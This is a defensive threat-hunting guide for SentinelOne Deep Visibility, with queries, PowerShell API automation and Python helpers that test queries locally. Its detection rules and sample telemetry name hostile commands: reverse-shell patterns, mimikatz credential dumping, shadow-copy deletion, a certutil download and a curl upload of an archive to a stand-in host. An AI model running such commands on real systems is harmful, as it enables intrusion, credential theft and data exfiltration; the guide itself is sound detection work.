## Overview
SentinelOne's Deep Visibility provides real-time telemetry for threat hunting across your entire endpoint fleet. This guide covers practical threat hunting techniques, from basic queries to advanced IOC detection.
### What You'll Learn
- Deep Visibility query syntax and operators
- Process tree analysis for attack detection
- Hunting for persistence mechanisms
- Lateral movement detection
- Building custom detection rules
- PowerShell API automation
### Why Deep Visibility?
| Traditional AV | SentinelOne Deep Visibility |
|---|---|
| Signature-based | Behavioral analysis |
| Post-infection alerts | Real-time telemetry |
| Limited forensics | Full process history |
| Manual investigation | Query-based hunting |
## Deep Visibility Query Basics
Deep Visibility uses a SQL-like query language to search endpoint telemetry.
### Query Structure
```
EventType = "Process Creation"
AND ProcessName = "powershell.exe"
AND ProcessCmdLine Contains "-enc"
```
### Common Operators
| Operator | Description | Example |
|---|---|---|
| = | Exact match | ProcessName = "cmd.exe" |
| Contains | Substring match | ProcessCmdLine Contains "mimikatz" |
| StartsWith | Prefix match | FilePath StartsWith "C:\Temp" |
| In | Multiple values | ProcessName In ("cmd.exe", "powershell.exe") |
| RegExp | Regex match | ProcessCmdLine RegExp "base64" |
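Before a query goes against production telemetry it helps to see exactly how these operators combine. The Python below is an added example, not part of this guide and not SentinelOne tooling: a small evaluator that parses the query syntax shown above (`=`, `>`, `Contains`, `StartsWith`, `EndsWith`, `In`, `Not In`, `RegExp`, `AND`, `OR`, parentheses) and applies it to a handful of constructed events using the guide's field names. It assumes two things about Deep Visibility that the guide does not state: string matching is case-insensitive, and `AND` binds tighter than `OR`. The sample queries are the guide's encoded-PowerShell, scheduled-task and parent-child hunts, plus one pair that shows what an ungrouped `OR` does to a hunt.

```python
import re

# Token classes, in group order: ( ) , comparison symbol "string" integer word. Inside a string a backslash
# and the character after it are kept verbatim, so RegExp "C:\\Users\\[^\\]+" reaches the regex engine as written.
_TOKEN = re.compile(r'\s*(?:(\()|(\))|(,)|([=<>]+)|"((?:[^"\\]|\\.)*)"|(\d+)|([A-Za-z_][A-Za-z0-9_]*))')
_KINDS = ("(", ")", ",", "KW", "STR", "NUM", "WORD")
_KEYWORDS = {"AND", "OR", "NOT", "IN", "CONTAINS", "STARTSWITH", "ENDSWITH", "REGEXP"}

def tokenize(query):
    tokens, pos, query = [], 0, query.strip()
    while pos < len(query):
        m = _TOKEN.match(query, pos)
        if not m:
            raise ValueError(f"unexpected text at offset {pos}: {query[pos:pos + 12]!r}")
        pos, kind, value = m.end(), _KINDS[m.lastindex - 1], m.group(m.lastindex)
        if kind == "WORD" and value.upper() in _KEYWORDS:   # keywords and operators become ("KW", UPPER)
            kind, value = "KW", value.upper()
        tokens.append((kind, int(value) if kind == "NUM" else value))
    return tokens + [("EOF", None)]

def _norm(value):
    return "" if value is None else str(value).lower()  # assumption: DV string matching is case-insensitive

def _compare(field, op, lit):
    """Predicate for one comparison; RegExp hands the literal to Python's re exactly as written."""
    pattern = re.compile(str(lit), re.IGNORECASE) if op == "REGEXP" else None
    return {
        "=": lambda ev: _norm(ev.get(field)) == _norm(lit),
        ">": lambda ev: float(ev.get(field) or 0) > lit,
        "CONTAINS": lambda ev: _norm(lit) in _norm(ev.get(field)),
        "STARTSWITH": lambda ev: _norm(ev.get(field)).startswith(_norm(lit)),
        "ENDSWITH": lambda ev: _norm(ev.get(field)).endswith(_norm(lit)),
        "REGEXP": lambda ev: pattern.search(str(ev.get(field) or "")) is not None,
    }[op]                                    # KeyError: an operator this evaluator does not support

class Parser:
    """Recursive descent: OR has the lowest precedence, AND binds tighter, parentheses group."""
    def __init__(self, query):
        self.toks, self.i = tokenize(query), 0

    def take(self, expect=None):
        tok = self.toks[self.i]
        if expect is not None and tok != expect:
            raise ValueError(f"expected {expect!r} at token {self.i}, got {tok!r}")
        self.i += tok[0] != "EOF"            # never step past the end marker
        return tok

    def expr(self):                          # expr := term (OR term)*
        parts = [self.term()]
        while self.toks[self.i] == ("KW", "OR"):
            self.take()
            parts.append(self.term())
        return parts[0] if len(parts) == 1 else (lambda ev: any(p(ev) for p in parts))

    def term(self):                          # term := factor (AND factor)*
        parts = [self.factor()]
        while self.toks[self.i] == ("KW", "AND"):
            self.take()
            parts.append(self.factor())
        return parts[0] if len(parts) == 1 else (lambda ev: all(p(ev) for p in parts))

    def factor(self):                        # factor := "(" expr ")" | FIELD [NOT] (op literal | IN "(" literal {, literal} ")")
        if self.toks[self.i][0] == "(":
            self.take()
            node = self.expr()
            self.take((")", ")"))
            return node
        field = self.take()[1]
        negate = self.toks[self.i] == ("KW", "NOT") and bool(self.take())
        kind, op = self.take()
        if (kind, op) == ("KW", "IN"):
            self.take(("(", "("))
            values, sep = set(), ","
            while sep == ",":
                values.add(_norm(self.take()[1]))
                sep = self.take()[0]
            test = lambda ev: _norm(ev.get(field)) in values
        else:
            test = _compare(field, op, self.take()[1])
        return (lambda ev: not test(ev)) if negate else test

def hunt(query, events):
    """Run a Deep Visibility-style query locally and return the matching event dicts."""
    parser = Parser(query)
    matcher = parser.expr()
    parser.take(("EOF", None))               # leftover tokens mean the query did not parse cleanly
    return [ev for ev in events if matcher(ev)]

def _ev(event_type, host, process, cmd="", **extra):    # constructed sample telemetry, not real data
    return {"EventType": event_type, "EndpointName": host, "ProcessName": process, "ProcessCmdLine": cmd, **extra}

SAMPLE_EVENTS = [
    _ev("Process Creation", "ws-01", "powershell.exe", "powershell.exe -NoP -enc aABpAA=="),
    _ev("Process Creation", "ws-01", "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
    _ev("Process Creation", "ws-02", "certutil.exe", "certutil.exe -urlcache -f http://example.invalid/a.txt a.txt"),
    _ev("Network Connection", "ws-02", "certutil.exe", NetworkBytes=12000000),
    _ev("Process Creation", "ws-02", "schtasks.exe", "schtasks.exe /create /tn Updater /tr C:\\Users\\alice\\Downloads\\u.exe"),
    _ev("Process Creation", "ws-03", "cmd.exe", "cmd.exe /c whoami", ParentProcessName="outlook.exe"),
]
Q_ENCODED = 'EventType = "Process Creation" AND ProcessName = "powershell.exe" AND ProcessCmdLine Contains "-enc"'
Q_TASK = r'EventType = "Process Creation" AND ProcessName = "schtasks.exe" AND ProcessCmdLine RegExp "C:\\Users\\[^\\]+\\Downloads"'
# Same clauses with and without grouping: AND binds tighter than OR, so Q_LOOSE also returns the certutil network event.
Q_LOOSE = 'EventType = "Process Creation" AND ParentProcessName = "outlook.exe" OR ProcessName In ("certutil.exe")'
Q_GROUPED = 'EventType = "Process Creation" AND (ParentProcessName = "outlook.exe" OR ProcessName In ("certutil.exe"))'
```

Running `hunt(Q_LOOSE, SAMPLE_EVENTS)` returns three events while `hunt(Q_GROUPED, SAMPLE_EVENTS)` returns two: without parentheses the `EventType` filter only applies to the left-hand term, so the `OR` branch silently widens the hunt to every event type. Checking a query against a few hand-built events like this is a cheap way to catch that before it produces a noisy or, worse, a quietly incomplete result set.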
### Event Types
- Process Creation - New process started
- Process Exit - Process terminated
- File Creation - New file written
- File Modification - Existing file changed
- Registry Key Creation - New registry key
- Registry Value Set - Registry value modified
- Network Connection - Outbound connection
- DNS Query - DNS resolution
## Hunting for Suspicious Processes
### Encoded PowerShell Commands
Attackers frequently use Base64-encoded PowerShell to evade detection:
```
EventType = "Process Creation"
AND ProcessName = "powershell.exe"
AND (
    ProcessCmdLine Contains "-enc" OR
    ProcessCmdLine Contains "-EncodedCommand" OR
    ProcessCmdLine Contains "-e " OR
    ProcessCmdLine Contains "FromBase64String"
)
```
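A hit from this hunt still has to be decoded before an analyst can judge it. The Python helper below is an added example, not code from this guide and not a SentinelOne API: it recognises every abbreviation powershell.exe accepts for `-EncodedCommand` (any prefix of the name, which is why the hunt above needs several spellings), decodes the UTF-16LE base64 payload, and flags a second layer of base64 in the decoded script. The command lines it is exercised with are constructed.

```python
import base64
import binascii


def _is_encoded_switch(arg):
    """powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...), case-insensitively."""
    name = arg[1:].lower()
    return arg.startswith("-") and name != "" and "encodedcommand".startswith(name)


def encode_command(script):
    """Build an -EncodedCommand value: base64 over the UTF-16LE bytes of the script (used here to make test input)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext script behind an encoded-command switch, or None if there is none or it is malformed."""
    args = cmdline.split()
    for i, arg in enumerate(args[:-1]):
        if not _is_encoded_switch(arg):
            continue
        try:
            raw = base64.b64decode(args[i + 1].strip("\"'"), validate=True)
        except (binascii.Error, ValueError):
            return None
        if len(raw) % 2:                     # UTF-16 needs an even byte count; anything else is not a PowerShell payload
            return None
        return raw.decode("utf-16-le", errors="replace")
    return None


def triage(cmdline):
    """Summarise one hunt hit for an analyst: decoded script plus a flag for a second layer of base64."""
    script = decode_encoded_command(cmdline)
    return {
        "encoded": script is not None,
        "script": script,
        "nested_base64": script is not None and "frombase64string" in script.lower(),
    }
```

`triage()` takes the `ProcessCmdLine` value straight from a query result; a `nested_base64` flag means the decoded script itself unpacks more base64 and needs another pass before its intent is clear.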
### Living Off the Land (LOLBins)
Hunt for abuse of legitimate Windows binaries:
```
EventType = "Process Creation"
AND ProcessName In (
    "certutil.exe",
    "bitsadmin.exe",
    "mshta.exe",
    "regsvr32.exe",
    "rundll32.exe",
    "wmic.exe",
    "msiexec.exe"
)
AND (
    ProcessCmdLine Contains "http" OR
    ProcessCmdLine Contains "ftp" OR
    ProcessCmdLine Contains "/transfer"
)
```
### Suspicious Parent-Child Relationships
Detect unusual process spawning patterns:
```
EventType = "Process Creation"
AND ParentProcessName = "outlook.exe"
AND ProcessName In ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")
```

Or, more broadly, anything unexpected spawned by Word:
```
EventType = "Process Creation"
AND ParentProcessName = "winword.exe"
AND ProcessName Not In ("splwow64.exe")
```
## Persistence Mechanism Detection
### Scheduled Tasks
Hunt for malicious scheduled task creation:
```
EventType = "Process Creation"
AND ProcessName = "schtasks.exe"
AND ProcessCmdLine Contains "/create"
```

More specifically, tasks whose action runs from a suspicious location:
```
EventType = "Process Creation"
AND ProcessName = "schtasks.exe"
AND (
    ProcessCmdLine Contains "AppData" OR
    ProcessCmdLine Contains "Temp" OR
    ProcessCmdLine Contains "ProgramData" OR
    ProcessCmdLine RegExp "C:\\Users\\[^\\]+\\Downloads"
)
```
### Registry Run Keys
Detect persistence via registry:
```
EventType = "Registry Value Set"
AND RegistryPath Contains "CurrentVersion\Run"
```

Or, naming the keys explicitly:
```
EventType = "Registry Value Set"
AND RegistryPath In (
    "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
)
```
### WMI Event Subscriptions
A more advanced persistence technique. The query below catches subscriptions created through wmic.exe:
```
EventType = "Process Creation"
AND ProcessName = "wmic.exe"
AND ProcessCmdLine Contains "EventConsumer"
```
## Lateral Movement Detection
### PsExec and Remote Execution
```
EventType = "Process Creation"
AND ProcessName In ("psexec.exe", "psexec64.exe", "paexec.exe")
```

Service-based lateral movement:
```
EventType = "Process Creation"
AND ProcessName = "sc.exe"
AND ProcessCmdLine Contains "\\"
AND ProcessCmdLine Contains "create"
```

The `\\` match picks out the `\\host` prefix that sc.exe needs in order to act on a remote machine.
### WMI Remote Execution
```
EventType = "Process Creation"
AND ProcessName = "wmic.exe"
AND ProcessCmdLine Contains "/node:"
AND ProcessCmdLine Contains "process call create"
```
### Pass-the-Hash Indicators
```
EventType = "Process Creation"
AND (
    ProcessName = "sekurlsa.exe" OR
    ProcessName = "mimikatz.exe" OR
    ProcessCmdLine Contains "sekurlsa::logonpasswords"
)
```

The three indicators are grouped in parentheses so that the `EventType` filter applies to all of them; written as `AND ... OR (...)` the second branch would match every event type.
### RDP Connections
```
EventType = "Network Connection"
AND DstPort = 3389
AND ConnectionStatus = "SUCCESS"
```
## Credential Access Detection
### LSASS Access
Credential dumping attempts:
```
EventType = "Process Access"
AND TargetProcessName = "lsass.exe"
AND SourceProcessName Not In (
    "csrss.exe",
    "wininit.exe",
    "services.exe"
)
```
### SAM Database Access
```
EventType = "File Read"
AND FilePath Contains "system32\config\SAM"
```
### Credential File Access
```
EventType = "File Read"
AND (
    FilePath Contains "Credentials" OR
    FilePath Contains ".rdp" OR
    FilePath Contains "ntds.dit" OR
    FileName RegExp "\.(ppk|pem|key)$"
)
```
## Data Exfiltration Detection
### Large Outbound Transfers
```
EventType = "Network Connection"
AND ConnectionDirection = "OUTBOUND"
AND NetworkBytes > 10000000
```
### Cloud Storage Uploads
```
EventType = "DNS Query"
AND DnsQuery In (
    "*.dropbox.com",
    "*.drive.google.com",
    "*.onedrive.live.com",
    "*.mega.nz",
    "*.pastebin.com"
)
```
### Archive Creation Before Exfil
```
EventType = "Process Creation"
AND ProcessName In ("7z.exe", "rar.exe", "zip.exe", "tar.exe")
AND ProcessCmdLine Contains "a "
| FollowedBy ProcessCreation
    WHERE ProcessCmdLine Contains "http"
    WITHIN 5 minutes
```
## PowerShell API Integration
### Authentication
```powershell
function Connect-SentinelOne {
    param(
        [Parameter(Mandatory)]
        [string]$ConsoleUrl,
        [Parameter(Mandatory)]
        [string]$ApiToken
    )
    $script:S1Session = @{
        BaseUrl = $ConsoleUrl.TrimEnd('/')
        Headers = @{
            "Authorization" = "ApiToken $ApiToken"
            "Content-Type"  = "application/json"
        }
    }
    # Verify connection
    try {
        $response = Invoke-RestMethod `
            -Uri "$($script:S1Session.BaseUrl)/web/api/v2.1/system/info" `
            -Headers $script:S1Session.Headers `
            -Method GET
        Write-Host "Connected to SentinelOne" -ForegroundColor Green
        Write-Host "  Version: $($response.data.build)"
        return $true
    }
    catch {
        Write-Error "Connection failed: $_"
        return $false
    }
}
```
### Execute Deep Visibility Query
```powershell
function Invoke-S1Query {
    param(
        [Parameter(Mandatory)]
        [string]$Query,
        # The "Z" suffix marks the timestamp as UTC, so convert before formatting
        [string]$FromDate = (Get-Date).ToUniversalTime().AddDays(-7).ToString("yyyy-MM-ddTHH:mm:ss.fffZ"),
        [string]$ToDate = (Get-Date).ToUniversalTime().ToString("yyyy-MM-ddTHH:mm:ss.fffZ"),
        [int]$Limit = 100
    )
    $body = @{
        query    = $Query
        fromDate = $FromDate
        toDate   = $ToDate
        limit    = $Limit
    } | ConvertTo-Json
    $response = Invoke-RestMethod `
        -Uri "$($script:S1Session.BaseUrl)/web/api/v2.1/dv/query" `
        -Headers $script:S1Session.Headers `
        -Method POST `
        -Body $body
    return $response.data
}

# Usage
$results = Invoke-S1Query -Query 'EventType = "Process Creation" AND ProcessName = "powershell.exe"'
$results | Select-Object endpointName, processCmd, createdAt
```
### Automated Threat Hunt
```powershell
function Start-ThreatHunt {
    param(
        [hashtable]$Queries,
        [string]$OutputPath = ".\hunt-results"
    )
    New-Item -Path $OutputPath -ItemType Directory -Force | Out-Null
    $findings = @()
    foreach ($hunt in $Queries.GetEnumerator()) {
        Write-Host "Running hunt: $($hunt.Key)..." -ForegroundColor Cyan
        $results = Invoke-S1Query -Query $hunt.Value
        if ($results.Count -gt 0) {
            Write-Host "  Found $($results.Count) matches" -ForegroundColor Yellow
            $findings += [PSCustomObject]@{
                Hunt    = $hunt.Key
                Query   = $hunt.Value
                Count   = $results.Count
                Results = $results
            }
            # Export results
            $results | Export-Csv `
                -Path "$OutputPath\$($hunt.Key -replace ' ', '-').csv" `
                -NoTypeInformation
        }
        else {
            Write-Host "  No matches" -ForegroundColor Green
        }
    }
    return $findings
}

# Define hunts
$hunts = @{
    "Encoded PowerShell" = 'EventType = "Process Creation" AND ProcessName = "powershell.exe" AND ProcessCmdLine Contains "-enc"'
    "LOLBin Download"    = 'EventType = "Process Creation" AND ProcessName = "certutil.exe" AND ProcessCmdLine Contains "http"'
    "Suspicious Tasks"   = 'EventType = "Process Creation" AND ProcessName = "schtasks.exe" AND ProcessCmdLine Contains "AppData"'
}

# Execute hunt
$results = Start-ThreatHunt -Queries $hunts
```
## Building Custom Detection Rules
### STAR Custom Rule
Create rules from successful hunts:
```powershell
function New-S1CustomRule {
    param(
        [Parameter(Mandatory)]
        [string]$Name,
        [Parameter(Mandatory)]
        [string]$Query,
        [ValidateSet("Low", "Medium", "High", "Critical")]
        [string]$Severity = "Medium",
        [string]$Description
    )
    $body = @{
        data = @{
            name        = $Name
            query       = $Query
            severity    = $Severity
            description = $Description
            enabled     = $true
        }
    } | ConvertTo-Json -Depth 5
    $response = Invoke-RestMethod `
        -Uri "$($script:S1Session.BaseUrl)/web/api/v2.1/star-custom-rules" `
        -Headers $script:S1Session.Headers `
        -Method POST `
        -Body $body
    Write-Host "Rule '$Name' created" -ForegroundColor Green
    return $response.data
}
```
### Example Rules
```powershell
# Detect Mimikatz
New-S1CustomRule `
    -Name "Mimikatz Execution Detected" `
    -Query 'ProcessCmdLine Contains "sekurlsa" OR ProcessCmdLine Contains "mimikatz"' `
    -Severity "Critical" `
    -Description "Detects Mimikatz credential dumping tool"

# Detect reverse shells
New-S1CustomRule `
    -Name "Potential Reverse Shell" `
    -Query 'ProcessCmdLine RegExp "nc.*-e|ncat.*-e|bash.*-i.*>&"' `
    -Severity "High" `
    -Description "Detects common reverse shell patterns"
```
## Ransomware Detection Queries
### Mass File Encryption
```
EventType = "File Modification"
| GroupBy EndpointName, ProcessName
    Having Count > 100
    Within 1 minute
```
### Known Ransomware Extensions
```
EventType = "File Creation"
AND (
    FileName EndsWith ".encrypted" OR
    FileName EndsWith ".locked" OR
    FileName EndsWith ".crypto" OR
    FileName RegExp "\.[a-z]{5,10}$"
)
| GroupBy EndpointName
    Having Count > 50
```
### Shadow Copy Deletion
```
EventType = "Process Creation"
AND (
    (ProcessName = "vssadmin.exe" AND ProcessCmdLine Contains "delete shadows") OR
    (ProcessName = "wmic.exe" AND ProcessCmdLine Contains "shadowcopy delete") OR
    (ProcessName = "bcdedit.exe" AND ProcessCmdLine Contains "recoveryenabled no")
)
```
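The `GroupBy ... Having Count ... Within` form in the ransomware queries and the `| FollowedBy ... WITHIN` form in the exfiltration section express aggregation over time rather than a per-event filter, which is why they are harder to reason about than the flat queries. The Python below is an added example, not code from this guide or from SentinelOne, that reproduces both with a sliding window over constructed events: the Mass File Encryption threshold (more than 100 modifications by one process on one endpoint inside a minute) and the Archive Creation Before Exfil sequence (an archiver add command followed within five minutes by a command line containing `http`). Field names follow the guide; the `CreatedAt` timestamps, hostnames and the `suspect.exe` process name are invented for the sample.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone


def parse_ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def burst_groups(events, key_fields, threshold, window):
    """Local stand-in for `GroupBy <fields> Having Count > threshold Within window`.

    One sliding window of timestamps per group; returns {group_key: time the threshold was first exceeded}.
    """
    recent, flagged = defaultdict(deque), {}
    for ev in sorted(events, key=lambda e: parse_ts(e["CreatedAt"])):
        key, ts = tuple(ev.get(f) for f in key_fields), parse_ts(ev["CreatedAt"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:        # discard timestamps that have fallen out of the window
            q.popleft()
        if len(q) > threshold and key not in flagged:
            flagged[key] = ts
    return flagged


def followed_by(events, first, second, window):
    """Local stand-in for `<first> | FollowedBy <second> WITHIN window`, correlated per endpoint."""
    pending, pairs = defaultdict(list), []
    for ev in sorted(events, key=lambda e: parse_ts(e["CreatedAt"])):
        ts, host = parse_ts(ev["CreatedAt"]), ev["EndpointName"]
        if second(ev):                   # checked before recording, so an event never pairs with itself
            pairs += [(prev, ev) for prev in pending[host] if ts - parse_ts(prev["CreatedAt"]) <= window]
        if first(ev):
            pending[host].append(ev)
    return pairs


def hunt_mass_modification(events):
    """Mass File Encryption: more than 100 modifications by one process on one endpoint inside one minute."""
    mods = [e for e in events if e["EventType"] == "File Modification"]
    return burst_groups(mods, ("EndpointName", "ProcessName"), 100, timedelta(minutes=1))


ARCHIVERS = {"7z.exe", "rar.exe", "zip.exe", "tar.exe"}


def hunt_archive_then_http(events):
    """Archive Creation Before Exfil: an archiver add ('a') command, then an http command line within 5 minutes."""
    def is_archive(e):
        argv = e.get("ProcessCmdLine", "").split()
        return e["EventType"] == "Process Creation" and e["ProcessName"].lower() in ARCHIVERS and argv[1:2] == ["a"]

    def is_http(e):
        return e["EventType"] == "Process Creation" and "http" in e.get("ProcessCmdLine", "").lower()

    return [(a["EndpointName"], a["ProcessCmdLine"], b["ProcessCmdLine"])
            for a, b in followed_by(events, is_archive, is_http, timedelta(minutes=5))]


# Constructed telemetry (not real data). One process touches 120 files in 30 s, a document editor saves
# 20 files over 10 minutes, and two archive+http sequences occur of which only one fits inside 5 minutes.
BASE = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)


def _ev(event_type, host, process, seconds, cmd=""):
    stamp = (BASE + timedelta(seconds=seconds)).isoformat().replace("+00:00", "Z")
    return {"EventType": event_type, "EndpointName": host, "ProcessName": process, "ProcessCmdLine": cmd, "CreatedAt": stamp}


SAMPLE_EVENTS = (
    [_ev("File Modification", "ws-01", "suspect.exe", i * 0.25) for i in range(120)]
    + [_ev("File Modification", "ws-01", "winword.exe", i * 30) for i in range(20)]
    + [_ev("Process Creation", "ws-02", "7z.exe", 600, "7z.exe a C:\\Temp\\docs.7z C:\\Users\\bob\\Documents"),
       _ev("Process Creation", "ws-02", "curl.exe", 720, "curl.exe -T C:\\Temp\\docs.7z http://example.invalid/"),
       _ev("Process Creation", "ws-03", "7z.exe", 0, "7z.exe a D:\\backup\\nightly.7z D:\\Data"),
       _ev("Process Creation", "ws-03", "curl.exe", 3600, "curl.exe http://example.invalid/status")]
)
```

`hunt_mass_modification(SAMPLE_EVENTS)` flags only `("ws-01", "suspect.exe")`, 25 seconds into the burst; the word processor never crosses the threshold because its saves are spread out. `hunt_archive_then_http(SAMPLE_EVENTS)` returns the ws-02 pair and ignores ws-03, whose `http` command comes an hour after the archive. The same two functions are a convenient place to replay exported query results when tuning the thresholds for your own environment.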
## Best Practices
- Start with known-good: understand normal before hunting abnormal
- Tune for environment: whitelist legitimate admin tools
- Document findings: keep hunt notebooks with queries and results
- Automate repeatable hunts: schedule weekly hunt routines
- Share IOCs: feed findings back into SIEM and firewall rules
- Practice on red team exercises: validate detection coverage
## Query Reference Card
| Use Case | Query Pattern |
|---|---|
| Process by name | ProcessName = "malware.exe" |
| Command line search | ProcessCmdLine Contains "suspicious" |
| File in location | FilePath StartsWith "C:\Temp" |
| Network to IP | DstIp = "192.168.1.100" |
| DNS lookup | DnsQuery Contains "evil.com" |
| Registry persistence | RegistryPath Contains "CurrentVersion\Run" |
| Time-bounded | CreatedAt > "2024-01-01T00:00:00Z" |